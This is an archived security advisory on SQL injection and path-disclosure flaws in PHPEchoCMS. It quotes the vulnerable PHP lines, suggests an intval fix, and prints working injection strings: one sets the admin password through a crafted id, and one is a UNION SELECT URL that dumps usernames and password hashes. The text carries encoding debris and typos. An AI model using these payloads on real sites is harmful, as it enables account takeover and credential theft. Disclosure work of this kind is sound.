TUCoPS :: Web :: CMS / Portals :: bx1499.htm

PHPEchoCMS Multible remote vulnerabilitis
PHPEchoCMS Multible remote vulnerabilitis
PHPEchoCMS Multible remote vulnerabilitis

PHPEchoCMS Multible remote vulnerabilitis=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
fiest thing ..=0D
full path=0D
every file to be included has to have the value of the variable $BASE_LOAD=0D
but if the register globals is on then you can use in the browser like this ..=0D
it will continue .. and other files too=0D
lines [31-49]=0D
    if (@$_POST['post']=='thread')=0D
        if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])=0D
                    // Add the thread to the specified section=0D
             $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', '".addslashes($_POST['id'])."', '-1', '".addslashes($_POST['title']).=0D
              "', '".str_replace("\n", "
", addslashes($_POST['contents']))."', '".$_SESSION['username']."','".date("d-m-Y H:i")."', '0')";=0D $res = query($ins, 1);=0D $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);=0D $res = query($ins, 1);=0D $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);=0D redirect ("index.php?module=forum&show=thread&id=".$nb);=0D }=0D else=0D {=0D $content = $mlang['017'];=0D =0D }=0D }=0D =0D see=0D $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);=0D =0D could be modified to an update query by posting value of id as next=0D id=union update members set password=[value] where id=1=0D =0D offcourse value here should be md5 hash .. and no brackets so the query will be ok :)=0D =0D =0D lines[138-142]=0D =0D elseif (@$_GET['show']=='thread' && $_GET['id'])=0D {=0D // Show a thread and its replies (child-threads)=0D =0D $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id=".addslashes($_GET['id']), 4);=0D =0D replace with=0D elseif (@$_GET['show']=='thread' && $_GET['id'])=0D {=0D // Show a thread and its replies (child-threads)=0D =0D $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id='".intval($_GET['id'])."'", 4);=0D =0D =0D exploit=0D index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*=0D =0D =0D =0D # WwW.SoQoR.NeT

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